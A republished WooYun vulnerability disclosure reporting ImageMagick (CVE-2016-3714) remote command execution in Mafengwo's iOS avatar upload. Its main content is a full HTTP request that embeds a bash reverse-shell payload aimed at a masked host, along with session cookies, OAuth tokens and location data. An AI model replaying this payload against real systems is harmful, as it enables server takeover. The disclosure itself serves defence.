马蜂窝某站远程命令执行

admin 2017年4月30日12:15:31评论346 views字数 194阅读0分38秒阅读模式
摘要

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

漏洞概要 关注数(9) 关注此漏洞

缺陷编号: WooYun-2016-205493

漏洞标题: 马蜂窝某站远程命令执行

相关厂商: 蚂蜂窝

漏洞作者: 路人甲

提交时间: 2016-05-05 22:20

公开时间: 2016-06-19 23:00

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程命令执行

0人收藏


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-05: 厂商已经确认,细节仅向厂商公开
2016-05-15: 细节向核心白帽子及相关领域专家公开
2016-05-25: 细节向普通白帽子公开
2016-06-04: 细节向实习白帽子公开
2016-06-19: 细节向公众公开

简要描述:

详细说明:

目标:蚂蜂窝IOS APP

头像上传地方存在CVE-2016-3714 - ImageMagick 命令执行分析

code 区域
POST https://m.mafengwo.cn/nb/public/xauth_change_user.php HTTP/1.1
Host: m.mafengwo.cn
Content-Type: multipart/form-data; boundary=Boundary+454EDE5BD920AC77
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ge39jptbg3r1hujdm9bhgqps55; __idfa=564443CC-9189-42C1-9CC9-0922116AD5C4; __idfv=CA34ED38-8E5B-4526-ADC2-201F233A5707; __mfwuuid=a811fb2e-75d5-fbb3-07c4-23a20157abf8; __openudid=34c68951fec87de860a9802862152f33442f8c37; mfw_uid=91729966; mfw_uuid=572b4a14-f864-0900-2f51-39ea5fc6ed2c; oad_n=a%3A3%3A%7Bs%3A3%3A%22oid%22%3Bi%3A2581%3Bs%3A2%3A%22dm%22%3Bs%3A13%3A%22m.mafengwo.cn%22%3Bs%3A2%3A%22ft%22%3Bs%3A19%3A%222016-05-05+21%3A26%3A44%22%3B%7D
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: TravelGuideMdd/7.4.4 (iPhone; iOS 9.3.1; Scale/2.00),Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 mfwappcode/cn.mafengwo.www mfwappver/7.4.4 mfwsdk/20160401 mfwjssdk/0.1
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 2731
Accept-Webp: 1

--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_code"

cn.mafengwo.www
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_ver"

7.4.4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="channel_id"

App Store
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_token"

95d871b76de2867dc8723af43a258c990fc6c6f5a565fccc20410adcd4e73f23
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_type"

ios
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="hardware_model"

iPhone8,1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfa"

564443CC-9189-42C1-9CC9-0922116AD5C4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfv"

CA34ED38-8E5B-4526-ADC2-201F233A5707
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="mfwsdk_ver"

20160401
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lat"

22.614055
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lng"

114.035890
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_consumer_key"

4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_nonce"

841a666f5d33a774deab83527c05188c
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature"

eL4MWstOj/x9mADziX8rlQHsgA0=
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature_method"

HMAC-SHA1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_timestamp"

1462455168
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_token"

91729966_778cee2f668645fee3e66a124d659eae
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_version"

1.0
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="open_udid"

34c68951fec87de860a9802862152f33442f8c37
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="screen_scale"

2
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="sys_ver"

9.3.1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="time_offset"

480
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="uid"

91729966
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="x_auth_mode"

client_auth
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="ulogo"; filename="ulogo"
Content-Type: image/jpeg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2015 0>&1")'
pop graphic-context
--Boundary+454EDE5BD920AC77--

漏洞证明:

反弹shell

马蜂窝某站远程命令执行

修复方案:

请多指教~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-05-05 22:54

厂商回复:

谢谢,我们马上处理

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-05-05 23:04 | toomi ( 路人 | Rank:12 漏洞数:4 | 小菜一枚)

    0

    今晚好多人都要加班啊。。。

  2. 2016-06-20 08:50 | 卡卡西 ( 实习白帽子 | Rank:49 漏洞数:10 | 低调学习)

    0

    反弹,高大上

  3. 2016-06-23 00:41 | n1Ce ( 路人 | Rank:2 漏洞数:1 | 面基品茶撸啊撸)

    0

    iphone,用什么抓包软件啊?burpsuit?

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin